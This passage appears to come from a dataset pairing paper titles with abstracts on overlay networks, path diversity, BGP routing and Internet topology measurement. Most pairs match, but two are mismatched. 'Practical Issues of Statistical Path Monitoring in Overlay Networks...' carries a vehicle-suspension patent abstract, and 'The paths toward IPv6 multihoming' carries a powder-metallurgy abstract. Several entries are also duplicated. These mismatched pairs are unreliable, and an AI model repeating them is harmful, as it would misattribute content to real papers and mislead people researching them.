algorithms. We then examine the effect of several factors, including network load, traffic variability, link-state staleness, number of overlay hops, measurement errors, and native sharing effects. Some of our results are rather surprising. For instance, we show that a significant measurement error, even up to 100% of the actual avail-bw value, has a negligible impact on the efficiency of overlay routing. --- paper_title: Backup path allocation based on a correlated link failure probability model in overlay networks paper_content: Communication reliability is a desired property in computer networks. One key technology to increase the reliability of a communication path is to provision a disjoint backup path. One of the main challenges in implementing this technique is that two paths that are disjoint at the IP or overlay layer may share the same physical links. As a result, although we may select a disjoint backup path at the overlay layer one physical link failure may cause the failure of both the primary and the backup paths. In this paper we propose a solution to address this problem. The main idea is to take into account the correlated link failure at the overlay layer More precisely, our goal is to find a route for the backup path to minimize the joint path failure probability between the primary and the backup paths. To demonstrate the feasibility of our approach, we perform extensive evaluations under both single and double link failure models. Our results show that, in terms of robustness, our approach is near optimal and is up to 60% better than no backup path reservation and is up to 30% better than using the traditional shortest disjoint path algorithm to select the backup path. --- paper_title: How to Select a Good Alternate Path in Large Peer-to-Peer Systems? paper_content: When multiple paths are available between communicating hosts, application quality can be improved by switching among them to always use the best one. The key to such an approach is the availability of diverse paths, i.e., paths with uncorrelated performance. A promising approach for implementing the necessary path diversity is to leverage the capabilities of peer-to-peer systems. Peer-to-peer systems are attractive not only because their many participating nodes can act as relays for others, and therefore offer a large number of different alternate paths, but also because their distributed operation can facilitate the deployment of the required functionality. However, these advantages come at a cost, as the sheer number of alternate path choices they offer creates its own challenge. In particular, because not all choices are equally good, it is necessary to develop mechanisms for easily and rapidly identifying relay nodes that yield good alternate paths. This paper is about the formulation and evaluation of such mechanisms in the context of large peerto-peer systems. Our goal is to devise techniques that for any given destination allow nodes to quickly select a candidate relay node with as small a cost as possible in terms of how much information they need to store or process. We combine several heuristics that rely only on local routing information, and validate the resulting solution by comparing it to a number of benchmark alternatives. This comparison is carried out using both topology data from RouteView/RIPE and PlanetLab nodes, and through measurements across a large set of PlanetLab nodes. --- paper_title: On the constancy of internet path properties paper_content: Many Internet protocols and operational procedures use measurements to guide future actions. This is an effective strategy if the quantities being measured exhibit a degree of constancy: that is, in some fundamental sense, they are not changing. In this paper we explore three different notions of constancy: mathematical, operational, and predictive. Using a large measurement dataset gathered from the NIMI infrastructure, we then apply these notions to three Internet path properties: loss, delay, and throughput. Our aim is to provide guidance as to when assumptions of various forms of constancy are sound, versus when they might prove misleading. --- paper_title: Traceroute probe method and forward IP path inference paper_content: Several traceroute probe methods exist, each designed to perform better in a scenario where another fails. This paper examines the effects that the choice of probe method has on the inferred forward IP path by comparing the paths inferred with UDP, ICMP, and TCP-based traceroute methods to (1) a list of routable IP addresses, (2) a list of known routers, and (3) a list of well-known websites. We further compare methods by examining seven months of macroscopic Internet topology data collected by CAIDA's Archipelago infrastructure. We found significant differences in the topology observed using different probe methods. In particular, we found that ICMP-based traceroute methods tend to successfully reach more destinations, as well as collect evidence of a greater number of AS links. UDP-based methods infer the greatest number of IP links, despite reaching the fewest destinations. We hypothesise that some per-flow load balancers implement different forwarding policies for TCP and UDP, and run a specific experiment to confirm this hypothesis. --- paper_title: Practical Issues of Statistical Path Monitoring in Overlay Networks with Large, Rank-Deficient Routing Matrices paper_content: A conventional form of vehicle axle suspension comprises on each side of a vehicle-a leaf spring pack and a shock absorber system. A height control system may also be included. According to this invention the leaf spring pack is replaced by a single leaf spring and a pair of air springs. The opposite ends of the single leaf spring are shackled to the existing shackle attachments and their vehicle frame mounts. Midway between its ends the single leaf spring is connected to the adjacent axle end by the existing spring-to-axle attachment components. In order to compensate for the difference in thicknesses of leaf spring pack and the single leaf spring at their midpoints, a spacer having a vertical thickness equal to the difference in the thicknesses is mounted on top of the single thickness spring at the axle. Air spring support brackets are symmetrically mounted on the chassis frame member on opposite sides of the axle. The upper end of each air spring is attached to one of the brackets and the lower end of each air spring is attached to the single leaf spring. Preferably a-height control system is provided on each side so as to maintain the chassis at a predetermined level. Except for the single leaf spring and the spacer, the other components may be of the type used in conventional leaf spring pack suspensions. --- paper_title: Using Type-of-Relationship (ToR) Graphs to Select Disjoint Paths in Overlay Networks paper_content: Routing policies used in the Internet can be restrictive, limiting communication between source-destination pairs to one path, when often better alternatives exist. To avoid route flapping, recovery mechanisms may be dampened, making adaptation slow. Unstructured overlays have been widely proposed to mitigate the issues of path and performance failures in the Internet by routing through an indirect-path via overlay peer(s). Choice of alternate-paths in overlay networks is a challenging issue. Ensuring both availability and performance guarantees on alternate paths requires aggressive monitoring of all overlay paths using active probing; this limits scalability when the number of overlay-paths becomes large. An alternate technique to select an overlay-path is to bias its selection based on physical disjointness criteria to bypass the failure on primary-path. In this paper, we show how type-of-relationship (ToR)-Graphs can be used to select maximally-disjoint overlay-paths. --- paper_title: Heuristics for Internet map discovery paper_content: Mercator is a program that uses hop-limited probes-the same primitive used in traceroute-to infer an Internet map. It uses informed random address probing to carefully exploring the IP address space when determining router adjacencies, uses source-route capable routers wherever possible to enhance the fidelity of the resulting map, and employs novel mechanisms for resolving aliases (interfaces belonging to the same router). This paper describes the design of these heuristics and our experiences with Mercator, and presents some preliminary analysis of the resulting Internet map. --- paper_title: Detection, Understanding, and Prevention of Traceroute Measurement Artifacts paper_content: Traceroute is widely used, from the diagnosis of network problems to the assemblage of internet maps. Unfortunately, there are a number of problems with traceroute methodology, which lead to the inference of erroneous routes. This paper studies particular structures arising in nearly all traceroute measurements. We characterize them as ''loops'', ''cycles'', and ''diamonds''. We identify load balancing as a possible cause for the appearance of false loops, cycles, and diamonds, i.e., artifacts that do not represent the internet topology. We provide a new publicly available traceroute, called Paris traceroute, which, by controlling the packet header contents, provides a truer picture of the actual routes that packets follow. We performed measurements, from the perspective of a single source tracing towards multiple destinations, and Paris traceroute allowed us to show that many of the particular structures we observe are indeed traceroute measurement artifacts. --- paper_title: Backup path allocation based on a correlated link failure probability model in overlay networks paper_content: Communication reliability is a desired property in computer networks. One key technology to increase the reliability of a communication path is to provision a disjoint backup path. One of the main challenges in implementing this technique is that two paths that are disjoint at the IP or overlay layer may share the same physical links. As a result, although we may select a disjoint backup path at the overlay layer one physical link failure may cause the failure of both the primary and the backup paths. In this paper we propose a solution to address this problem. The main idea is to take into account the correlated link failure at the overlay layer More precisely, our goal is to find a route for the backup path to minimize the joint path failure probability between the primary and the backup paths. To demonstrate the feasibility of our approach, we perform extensive evaluations under both single and double link failure models. Our results show that, in terms of robustness, our approach is near optimal and is up to 60% better than no backup path reservation and is up to 30% better than using the traditional shortest disjoint path algorithm to select the backup path. --- paper_title: Interdomain Traffic Engineering with BGP paper_content: Traffic engineering is performed by means of a set of techniques that can be used to better control the flow of packets inside an IP network. We discuss the utilization of these techniques across interdomain boundaries in the global Internet. We first analyze the characteristics of interdomain traffic on the basis of measurements from three different Internet service providers and show that a small number of sources are responsible for a large fraction of the traffic. Across interdomain boundaries, traffic engineering relies on a careful tuning of the route advertisements sent via the border gateway protocol. We explain how this tuning can be used to control the flow of incoming and outgoing traffic, and identify its limitations. --- paper_title: Managing a portfolio of overlay paths paper_content: In recent years, several architectures have been proposed and developed for supporting streaming applications that take advantage of multiple paths through the network simultaneously. We consider the problem of computing a set of paths and the relative amounts of data conveyed through them in order to provide the desired level of performance for data streams. Given the expectation, variance, and covariance of an appropriate metric of interest for overlay links, we attempt to solve the underlying resource allocation problem by applying methods used in managing a finance portfolio. We observe that the flow allocation problem requires constrained application of these methods, and we discuss the tractability of enforcing the constraints. We finally present some simulation results to evaluate the effectiveness of our proposed techniques. --- paper_title: On characterizing BGP routing table growth paper_content: The sizes of the BGP routing tables have increased by an order of magnitude over the last six years. This dramatic growth of the routing table can decrease the packet forwarding speed and demand more router memory space. In this paper, we explore the extent that various factors contribute to the routing table size and characterize the growth of each contribution. We begin with measurement study using routing tables of Oregon Route Views server to determine the contributions of multi-homing, load balancing, address fragmentation, and failure to aggregate to routing table size. We find that the contribution of address fragmentation is the greatest and is three times that of multi-homing or load balancing. The contribution of failure to aggregate is the least. Although multi-homing and load balancing contribute less to routing table size than address fragmentation does, we observe that the contribution of multi-homing and that of load balancing grow faster than the routing table does and that the load balancing has surpassed multihoming becoming the fastest growing contributor. Moreover, we find that both load balancing and multi-homing contribute to routing table growth by introducing more prefixes of length greater than 17 but less than 25, which is the fastest growing class of prefixes. Next, we compare the growth of the routing table to the expanding of IP addresses that can be routed and conclude that the growth of routable IP addresses is much slower than that of routing table size. Last, we demonstrate that our findings based on the view derived from the Oregon server are accurate through evaluation using additional 15 routing tables collected from different locations in the Internet. --- paper_title: R-BGP: Staying Connected in a Connected World paper_content: Many studies show that, when Internet links go up or down, the dynamics of BGP may cause several minutes of packet loss. The loss occurs even when multiple paths between the sender and receiver domains exist, and is unwarranted given the high connectivity of the Internet. ::: ::: Our objective is to ensure that Internet domains stay connected as long as the underlying network is connected. Our solution, R-BGP works by pre-computing a few strategically chosen failover paths. R-BGP provably guarantees that a domain will not become disconnected from any destination as long as it will have a policy-compliant path to that destination after convergence. Surprisingly, this can be done using a few simple and practical modifications to BGP, and, like BGP, requires announcing only one path per neighbor. Simulations on the AS-level graph of the current Internet show that R-BGP reduces the number of domains that see transient disconnectivity resulting from a link failure from 22% for edge links and 14% for core links down to zero in both cases. --- paper_title: Best-path vs. multi-path overlay routing paper_content: Time-varying congestion on Internet paths and failures due to software, hardware, and configuration errors often disrupt packet delivery on the Internet.Many aproaches to avoiding these problems use multiple paths between two network locations. These approaches rely on a path-independence assumption in order to work well; i.e., they work best when the problems on different paths between two locations are uncorrelated in time.This paper examines the extent to which this assumption holds on the Internet by analyzing 14 days of data collected from 30 nodes in the RON testbed. We examine two problems that manifest themselves---congestion-triggered loss and path failures---and find that the chances of losing two packets between the same hosts is nearly as high when those packets are sent through an intermediate node (60%) as when they are sent back-to-back on the same path (70%). In so doing, we also compare two different ways of taking advantage of path redundancy proposed in the literature: mesh routing based on packet replication, and reactive routing based on adaptive path selection. --- paper_title: Exploiting routing redundancy via structured peer-to-peer overlays paper_content: Structured peer-to-peer overlays provide a natural infrastructure for resilient routing via efficient fault detection and precomputation of backup paths. These overlays can respond to faults in a few hundred milliseconds by rapidly shifting between alternate routes. In this paper, we present two adaptive mechanisms for structured overlays and illustrate their operation in the context of Tapestry, a fault-resilient overlay from Berkeley. We also describe a transparent, protocol-independent traffic redirection mechanism that tunnels legacy application traffic through overlays. Our measurements of a Tapestry prototype show it to be a highly responsive routing service, effective at circumventing a range of failures while incurring reasonable cost in maintenance bandwidth and additional routing latency. --- paper_title: MIRO: multi-path interdomain routing paper_content: The Internet consists of thousands of independent domains with different, and sometimes competing, business interests. However, the current interdomain routing protocol (BGP) limits each router to using a single route for each destination prefix, which may not satisfy the diverse requirements of end users. Recent proposals for source routing offer an alternative where end hosts or edge routers select the end-to-end paths. However, source routing leaves transit domains with very little control and introduces difficult scalability and security challenges. In this paper, we present a multi-path inter-domain routing protocol called MIRO that offers substantial flexiility, while giving transit domains control over the flow of traffic through their infrastructure and avoiding state explosion in disseminating reachability information. In MIRO, routers learn default routes through the existing BGP protocol, and arbitrary pairs of domains can negotiate the use of additional paths (bound to tunnels in the data plane) tailored to their special needs. MIRO retains the simplicity of BGP for most traffic, and remains backwards compatible with BGP to allow for incremental deployability. Experiments with Internet topology and routing data illustrate that MIRO offers tremendous flexibility for path selection with reasonable overhead. --- paper_title: Improving the Reliability of Internet Paths with One-hop Source Routing paper_content: Recent work has focused on increasing availability in the face of Internet path failures. To date, proposed solutions have relied on complex routing and path-monitoring schemes, trading scalability for availability among a relatively small set of hosts. ::: ::: This paper proposes a simple, scalable approach to recover from Internet path failures. Our contributions are threefold. First, we conduct a broad measurement study of Internet path failures on a collection of 3,153 Internet destinations consisting of popular Web servers, broad-band hosts, and randomly selected nodes. We monitored these destinations from 67 PlanetLab vantage points over a period of seven days, and found availabilities ranging from 99.6% for servers to 94.4% for broadband hosts. When failures do occur, many appear too close to the destination (e.g., last-hop and end-host failures) to be mitigated through alternative routing techniques of any kind. Second, we show that for the failures that can be addressed through routing, a simple, scalable technique, called one-hop source routing, can achieve close to the maximum benefit available with very low overhead. When a path failure occurs, our scheme attempts to recover from it by routing indirectly through a small set of randomly chosen intermediaries. ::: ::: Third, we implemented and deployed a prototype one-hop source routing infrastructure on PlanetLab. Over a three day period, we repeatedly fetched documents from 982 popular Internet Web servers and used one-hop source routing to attempt to route around the failures we observed. Our results show that our prototype successfully recovered from 56% of network failures. However, we also found a large number of server failures that cannot be addressed through alternative routing. ::: ::: Our research demonstrates that one-hop source routing is easy to implement, adds negligible overhead, and achieves close to the maximum benefit available to indirect routing schemes, without the need for path monitoring, history, or a-priori knowledge of any kind. --- paper_title: Source selectable path diversity via routing deflections paper_content: We present the design of a routing system in which end-systems set tags to select non-shortest path routes as an alternative to explicit source routes. Routers collectively generate these routes by using tags as hints to independently deflect packets to neighbors that lie off the shortest-path. We show how this can be done simply, by local extensions of the shortest path machinery, and safely, so that loops are provably not formed. The result is to provide end-systems with a high-level of path diversity that allows them to bypass unde-sirable locations within the network. Unlike explicit source routing, our scheme is inherently scalable and compatible with ISP policies because it derives from the deployed Internet routing. We also sug-gest an encoding that is compatible with common IP usage, making our scheme incrementally deployable at the granularity of individual routers. --- paper_title: Improving the Reliability of Internet Paths with One-hop Source Routing paper_content: Recent work has focused on increasing availability in the face of Internet path failures. To date, proposed solutions have relied on complex routing and path-monitoring schemes, trading scalability for availability among a relatively small set of hosts. ::: ::: This paper proposes a simple, scalable approach to recover from Internet path failures. Our contributions are threefold. First, we conduct a broad measurement study of Internet path failures on a collection of 3,153 Internet destinations consisting of popular Web servers, broad-band hosts, and randomly selected nodes. We monitored these destinations from 67 PlanetLab vantage points over a period of seven days, and found availabilities ranging from 99.6% for servers to 94.4% for broadband hosts. When failures do occur, many appear too close to the destination (e.g., last-hop and end-host failures) to be mitigated through alternative routing techniques of any kind. Second, we show that for the failures that can be addressed through routing, a simple, scalable technique, called one-hop source routing, can achieve close to the maximum benefit available with very low overhead. When a path failure occurs, our scheme attempts to recover from it by routing indirectly through a small set of randomly chosen intermediaries. ::: ::: Third, we implemented and deployed a prototype one-hop source routing infrastructure on PlanetLab. Over a three day period, we repeatedly fetched documents from 982 popular Internet Web servers and used one-hop source routing to attempt to route around the failures we observed. Our results show that our prototype successfully recovered from 56% of network failures. However, we also found a large number of server failures that cannot be addressed through alternative routing. ::: ::: Our research demonstrates that one-hop source routing is easy to implement, adds negligible overhead, and achieves close to the maximum benefit available to indirect routing schemes, without the need for path monitoring, history, or a-priori knowledge of any kind. --- paper_title: Network sensitivity to hot-potato disruptions paper_content: Hot-potato routing is a mechanism employed when there are multiple (equally good) interdomain routes available for a given destination. In this scenario, the Border Gateway Protocol (BGP) selects the interdomain route associated with the closest egress point based upon intradomain path costs. Consequently, intradomain routing changes can impact interdomain routing and cause abrupt swings of external routes, which we call hot-potato disruptions. Recent work has shown that hot-potato disruptions can have a substantial impact on large ISP backbones and thereby jeopardize the network robustness. As a result, there is a need for guidelines and tools to assist in the design of networks that minimize hot-potato disruptions. However, developing these tools is challenging due to the complex and subtle nature of the interactions between exterior and interior routing. In this paper, we address these challenges using an analytic model of hot-potato routing that incorporates metrics to evaluate network sensitivity to hot-potato disruptions. We then present a methodology for computing these metrics using measurements of real ISP networks. We demonstrate the utility of our model by analyzing the sensitivity of a large AS in a tier~1 ISP network. --- paper_title: Source selectable path diversity via routing deflections paper_content: We present the design of a routing system in which end-systems set tags to select non-shortest path routes as an alternative to explicit source routes. Routers collectively generate these routes by using tags as hints to independently deflect packets to neighbors that lie off the shortest-path. We show how this can be done simply, by local extensions of the shortest path machinery, and safely, so that loops are provably not formed. The result is to provide end-systems with a high-level of path diversity that allows them to bypass unde-sirable locations within the network. Unlike explicit source routing, our scheme is inherently scalable and compatible with ISP policies because it derives from the deployed Internet routing. We also sug-gest an encoding that is compatible with common IP usage, making our scheme incrementally deployable at the granularity of individual routers. --- paper_title: The Rich-Club Phenomenon In The Internet Topology paper_content: We show that the Internet topology at the autonomous system (AS) level has a rich-club phenomenon. The rich nodes, which are a small number of nodes with large numbers of links, are very well connected to each other. The rich-club is a core tier that we measured using the rich-club connectivity and the node-node link distribution. We obtained this core tier without any heuristic assumption between the ASs. The rich-club phenomenon is a simple qualitative way to differentiate between power law topologies and provides a criterion for new network models. To show this, we compared the measured rich-club of the AS graph with networks obtained using the Baraba/spl acute/si-Albert (BA) scale-free network model, the Fitness BA model and the Inet-3.0 model. --- paper_title: Algebra-Based Scalable Overlay Network Monitoring: Algorithms, Evaluation, and Applications paper_content: Overlay network monitoring enables distributed Internet applications to detect and recover from path outages and periods of degraded performance within seconds. For an overlay network with n end hosts, existing systems either require O(n2) measurements, and thus lack scalability, or can only estimate the latency but not congestion or failures. Our earlier extended abstract [Y. Chen, D. Bindel, and R. H. Katz, "Tomography-based overlay network monitoring," Proceedings of the ACM SIGCOMM Internet Measurement Conference (IMC), 2003] briefly proposes an algebraic approach that selectively monitors k linearly independent paths that can fully describe all the O(n2) paths. The loss rates and latency of these k paths can be used to estimate the loss rates and latency of all other paths. Our scheme only assumes knowledge of the underlying IP topology, with links dynamically varying between lossy and normal. In this paper, we improve, implement, and extensively evaluate such a monitoring system. We further make the following contributions: i) scalability analysis indicating that for reasonably large n (e.g., 100), the growth of k is bounded as O(n log n), ii) efficient adaptation algorithms for topology changes, such as the addition or removal of end hosts and routing changes, iii) measurement load balancing schemes, iv) topology measurement error handling, and v) design and implementation of an adaptive streaming media system as a representative application. Both simulation and Internet experiments demonstrate we obtain highly accurate path loss rate estimation while adapting to topology changes within seconds and handling topology errors. --- paper_title: The paths toward IPv6 multihoming paper_content: A powder metallurgical method of producing metal bodies using spherical powder, produced by inert gas atomization, from magnetizable material with a particle size distribution closely approximating the so called Fuller curve for maximum density packing of spherical particles. Said powder is magnetized and filled into a form, which may take place before or after magnetization, said mixed and magnetized powder then sintered in said form with the exclusion of air, to produce a sintered body without communicating porosity. --- paper_title: MIRO: multi-path interdomain routing paper_content: The Internet consists of thousands of independent domains with different, and sometimes competing, business interests. However, the current interdomain routing protocol (BGP) limits each router to using a single route for each destination prefix, which may not satisfy the diverse requirements of end users. Recent proposals for source routing offer an alternative where end hosts or edge routers select the end-to-end paths. However, source routing leaves transit domains with very little control and introduces difficult scalability and security challenges. In this paper, we present a multi-path inter-domain routing protocol called MIRO that offers substantial flexiility, while giving transit domains control over the flow of traffic through their infrastructure and avoiding state explosion in disseminating reachability information. In MIRO, routers learn default routes through the existing BGP protocol, and arbitrary pairs of domains can negotiate the use of additional paths (bound to tunnels in the data plane) tailored to their special needs. MIRO retains the simplicity of BGP for most traffic, and remains backwards compatible with BGP to allow for incremental deployability. Experiments with Internet topology and routing data illustrate that MIRO offers tremendous flexibility for path selection with reasonable overhead. --- paper_title: Path-Computation-Element-Based Architecture for Interdomain MPLS/GMPLS Traffic Engineering: Overview and Performance paper_content: The Path Computation Element Working Group at the Internet Engineering Task Force is chartered to specify a PCE-based architecture for the path computation of interdomain MPLS- and GMPLS-based traffic engineered label switched paths. In this architecture, path computation does not occur at the head-end LSR, but on another path computation entity that may not be physically located on the head-end LSR. This method is greatly different from the traditional "per-domain" approach to path computation. This article presents analysis and results that compare performance of the PCE architecture with the current state-of-the-art approach. Detailed simulations are undertaken on varied and realistic scenarios where preliminary results show several performance benefits from the deployment of PCE. To provide a complete overview of significant development taking place in this area, milestones and progress at the IETF PCE WG are also discussed. --- paper_title: An evaluation of IP-based fast reroute techniques paper_content: Today, IP-based networks are used to carry all types of traffic, from the traditional best-effort Internet access to traffic with much more stringent requirements such as realtime voice or video services and Virtual Private Networks. Some of those services have strong requirements in terms of restoration time in case of failure. When a link or a router fails in an IP network, the routers adjacent to the failing ressource must react by distributing new routing information to allow each router of the network to update its routing table. A realistic estimate of the convergence time of a tuned intradomain routing protocol in a large network is a few hundred of milliseconds [1]. For some mission critical services like voice or video over IP, achieving a restoration time in the order of a few tens of milliseconds after a failure is important [2]. In this paper, we first present several techniques that can be used to achieve such a short restoration time. While most of the work on fast restoration has focussed on MPLS-based solutions [2], recent work indicate that fast restoration techniques can be developed also for pure IP networks. Recently, the RTGWG working group of the IETF started to work actively on this problem and several fast reroute techniques are being discussed. However, as of today, no detailed evaluation of the various proposed IP-based fast reroute techniques has been published. The goal of this short paper is to firstly provide a brief overview of fast restoration techniques suitable for pure IP networks, in section 2. Then, in section 3, we evaluate by simulation how many links can be protected by each technique in large ISP networks based on their actual topology. This coverage is an important issue as some techniques cannot protect all links from failures. --- paper_title: Exploring the performance benefits of end-to-end path switching paper_content: This paper explores the feasibility of improving the performance of end-to-end data transfers between different sites through path switching. Our study is focused on both the logic that controls path switching decisions and the configurations required to achieve sufficient path diversity. Specifically, we investigate two common approaches offering path diversity - multi-homing and overlay networks - and investigate their characteristics in the context of a representative wide-area testbed. We explore the end-to-end delay and loss characteristics of different paths and find that substantial improvements can potentially be achived by path switching, especially in lowering end-to-end losses. Based on this assessment, we develop a simple path-switching mechanism capable of realizing those performance improvements. Our experimental study demonstrates that substantial performance improvements are indeed achievable using this approach. --- paper_title: On characterizing BGP routing table growth paper_content: The sizes of the BGP routing tables have increased by an order of magnitude over the last six years. This dramatic growth of the routing table can decrease the packet forwarding speed and demand more router memory space. In this paper, we explore the extent that various factors contribute to the routing table size and characterize the growth of each contribution. We begin with measurement study using routing tables of Oregon Route Views server to determine the contributions of multi-homing, load balancing, address fragmentation, and failure to aggregate to routing table size. We find that the contribution of address fragmentation is the greatest and is three times that of multi-homing or load balancing. The contribution of failure to aggregate is the least. Although multi-homing and load balancing contribute less to routing table size than address fragmentation does, we observe that the contribution of multi-homing and that of load balancing grow faster than the routing table does and that the load balancing has surpassed multihoming becoming the fastest growing contributor. Moreover, we find that both load balancing and multi-homing contribute to routing table growth by introducing more prefixes of length greater than 17 but less than 25, which is the fastest growing class of prefixes. Next, we compare the growth of the routing table to the expanding of IP addresses that can be routed and conclude that the growth of routable IP addresses is much slower than that of routing table size. Last, we demonstrate that our findings based on the view derived from the Oregon server are accurate through evaluation using additional 15 routing tables collected from different locations in the Internet. --- paper_title: Improved BGP convergence via ghost flushing paper_content: Labovitz et al. (2001) and Labovitz et al. (2000) noticed that sometimes it takes border gateway protocol (BGP) a substantial amount of time and messages to converge and stabilize following the failure of some node in the Internet. In this paper, we suggest a minor modification to BGP that eliminates the problem pointed out and substantially reduces the convergence time and communication complexity of BGP. Roughly speaking, our modification ensures that bad news (the failure of a node/edge) propagate fast, while good news (the establishment of a new path to a destination) propagate somewhat slower. This is achieved in BGP by allowing withdrawal messages to propagate with no delay as fast as the network forward them, while announcements propagate as they do in BGP with a delay at each node of one minRouteAdver (except for the first wave of announcements). As a by product of this work, a new stateless mechanism to overcome the counting to infinity problem is provided, which compares favorably with other known stateless mechanisms (in RIP and IGRP). --- paper_title: Source selectable path diversity via routing deflections paper_content: We present the design of a routing system in which end-systems set tags to select non-shortest path routes as an alternative to explicit source routes. Routers collectively generate these routes by using tags as hints to independently deflect packets to neighbors that lie off the shortest-path. We show how this can be done simply, by local extensions of the shortest path machinery, and safely, so that loops are provably not formed. The result is to provide end-systems with a high-level of path diversity that allows them to bypass unde-sirable locations within the network. Unlike explicit source routing, our scheme is inherently scalable and compatible with ISP policies because it derives from the deployed Internet routing. We also sug-gest an encoding that is compatible with common IP usage, making our scheme incrementally deployable at the granularity of individual routers. --- paper_title: Internet connectivity at the AS-level: an optimization-driven modeling approach paper_content: Two ASs are connected in the Internet AS graph only if they have a business "peering relationship." By focusing on the AS subgraph ASPC whose links represent provider-customer relationships, we develop a new optimization-driven model for Internet growth at the ASPC level. The model's defining feature is an explicit construction of a novel class of intuitive, multi-objective, local optimizations by which the different customer ASs determine in a fully distributed and decentralized fashion their "best" upstream provider AS. Key criteria that are explicitly accounted for in the formulation of these multi-objective optimization problems are (i) AS-geography, i.e., locality and number of PoPs within individual ASs; (ii) AS-specific business models, abstract toy models that describe how individual ASs choose their "best" provider; and (iii) AS evolution, a historic account of the "lives" of individual ASs in a dynamic ISP market. We show that the resulting model is broadly robust, perforce yields graphs that match inferred AS connectivity with respect to a number of different metrics, and is ideal for exploring the impact of new peering incentives or policies on AS-level connectivity. --- paper_title: A distributed approach to topology-aware overlay path monitoring paper_content: Path probing is essential to maintain an efficient overlay network topology. However, the cost of complete probing can be as high as O(n/sup 2/), which is prohibitive in large-scale overlay networks. Recently we proposed a method that trades probing overhead for inference accuracy in sparse networks such as the Internet. The method uses physical path information to infer path quality for all of the n/spl times/(n-1) overlay paths, while actually probing only a subset of the paths. We propose and evaluate a distributed approach to implement this method. We describe a minimum diameter, link-stress bounded overlay spanning tree, which is used to collect and disseminate path quality information. All nodes in the tree collaborate to infer the quality of all paths. Simulation results show this approach can achieve a high-level of inference accuracy while reducing probing overhead and balancing link stress on the spanning tree. --- paper_title: Improving multipath reliability in topology-aware overlay networks paper_content: Use of multiple paths between node pairs can enable an overlay network to bypass Internet link failures. Selecting high quality primary and backup paths is challenging, however. To maximize communication reliability, an overlay multipath routing protocol must account for both the failure probability of a single path and link sharing among multiple paths. We propose a practical solution that exploits physical topology information and end-to-end path quality measurement results to select high quality path pairs. Simulation results show the proposed approach is effective in achieving higher multipath reliability in overlay networks at reasonable communication cost. --- paper_title: On the cost-quality tradeoff in topology-aware overlay path probing paper_content: Path probing is essential to maintaining an efficient overlay network topology. However, the cost of a full-scale probing is as high as O(n/sup 2/), which is prohibitive in large-scale overlay networks. Several methods have been proposed to reduce probing overhead, although at a cost in terms of probing completeness. In this paper, an orthogonal solution is proposed that trades probing overhead for estimation accuracy in sparse networks such as the Internet. The proposed solution uses network-level path composition information (for example, as provided by a topology server) to infer path quality without full-scale probing. The inference metrics include latency, loss rate and available bandwidth. This approach is used to design several probing algorithms, which are evaluated through analysis and simulation. The results show that the proposed method can significantly reduce probing overhead while providing hounded quality estimations for all n /spl times/ (n - 1) overlay paths. The solution is well suited to medium-scale overlay networks in the Internet. In other environments, it can be combined with extant probing algorithms to further improve performance. --- paper_title: Characterizing selfishly constructed overlay routing networks paper_content: We analyze the characteristics of overlay routing networks generated by selfish nodes playing competitive network construction games. We explore several networking scenarios - some simplistic, others more realistic - and analyze the resulting Nash equilibrium graphs with respect to topology, performance, and resilience. We find a fundamental tradeoff between performance and resilience, and show that limiting the degree of nodes is of great importance in controlling this balance. Further, by varying the cost function, the game produces widely different topologies; one parameter in particular - the relative cost between maintaining an overlay link and increasing the path length to other nodes - can generate topologies with node-degree distributions whose tails vary from exponential to power-law. We conclude that competitive games can create overlay routing networks satisfying very diverse goals. --- paper_title: Comparing the structure of power-law graphs and the Internet AS graph paper_content: In this work we devise algorithmic techniques to compare the interconnection structure of the Internet AS graph with that of graphs produced by topology generators that match the power-law degree distribution of the AS graph. We are guided by the existing notion that nodes in the AS graph can be placed in tiers with the resulting graph having an hierarchical structure. Our techniques are based on identifying graph nodes at each tier, decomposing the graph by removing such nodes and their incident edges, and thus explicitly revealing the interconnection structure of the graph. We define quantitative metrics to analyze and compare the decomposition of synthetic power-law graphs with the Internet-AS graph. Through experiments, we observe qualitative similarities in the decomposition structure of the different families of power-law graphs and explain any quantitative differences based on their generative models. We believe our approach provides insight into the interconnection structure of the AS graph and finds continuing applications in evaluating the representativeness of synthetic topology generators. --- paper_title: The Rich-Club Phenomenon In The Internet Topology paper_content: We show that the Internet topology at the autonomous system (AS) level has a rich-club phenomenon. The rich nodes, which are a small number of nodes with large numbers of links, are very well connected to each other. The rich-club is a core tier that we measured using the rich-club connectivity and the node-node link distribution. We obtained this core tier without any heuristic assumption between the ASs. The rich-club phenomenon is a simple qualitative way to differentiate between power law topologies and provides a criterion for new network models. To show this, we compared the measured rich-club of the AS graph with networks obtained using the Baraba/spl acute/si-Albert (BA) scale-free network model, the Fitness BA model and the Inet-3.0 model. --- paper_title: Race Conditions in Coexisting Overlay Networks paper_content: By allowing end hosts to make independent routing decisions at the application level, different overlay networks may unintentionally interfere with each other. This paper describes how multiple similar or dissimilar overlay networks could experience race conditions, resulting in oscillations (in both route selection and network load) and cascading reactions. We pinpoint the causes for synchronization and derive an analytic formulation for the synchronization probability of two overlays. Our model indicates that the probability of synchronization is non-negligible across a wide range of parameter settings, thus implying that the ill effects of synchronization should not be ignored. Using the analytical model, we find an upper bound on the duration of traffic oscillations. We also show that the model can be easily extended to include a large number of co-existing overlays. We validate our model through simulations that are designed to capture the transient routing behavior of both the IP- and overlay-layers. We use our model to study the effects of factors such as path diversity (measured in round trip times) and probing aggressiveness on these race conditions. Finally, we discuss the implications of our study on the design of path probing process in overlay networks and examine strategies to reduce the impact of race conditions. --- paper_title: Brocade: Landmark Routing on Overlay Networks paper_content: Recent work such as Tapestry, Pastry, Chord and CAN provide efficient location utilities in the form of overlay infrastructures. These systems treat nodes as if they possessed uniform resources, such as network bandwidth and connectivity. In this paper, we propose a systemic design for a secondaryoverlay of super-nodes which can be used to deliver messages directly to the destination's local network, thus improving route efficiency. We demonstrate the potential performance benefits by proposing a name mapping scheme for a Tapestry-Tapestry secondary overlay, and show preliminary simulation results demonstrating significant routing performance improvement. --- paper_title: Drafting behind Akamai (travelocity-based detouring) paper_content: To enhance web browsing experiences, content distribution networks (CDNs) move web content "closer" to clients by caching copies of web objects on thousands of servers worldwide. Additionally, to minimize client download times, such systems perform extensive network and server measurements, and use them to redirect clients to different servers over short time scales. In this paper, we explore techniques for inferring and exploiting network measurements performed by the largest CDN, Akamai; our objective is to locate and utilize quality Internet paths without performing extensive path probing or monitoring.Our contributions are threefold. First, we conduct a broad measurement study of Akamai's CDN. We probe Akamai's network from 140 PlanetLab vantage points for two months. We find that Akamai redirection times, while slightly higher than advertised, are sufficiently low to be useful for network control. Second, we empirically show that Akamai redirections overwhelmingly correlate with network latencies on the paths between clients and 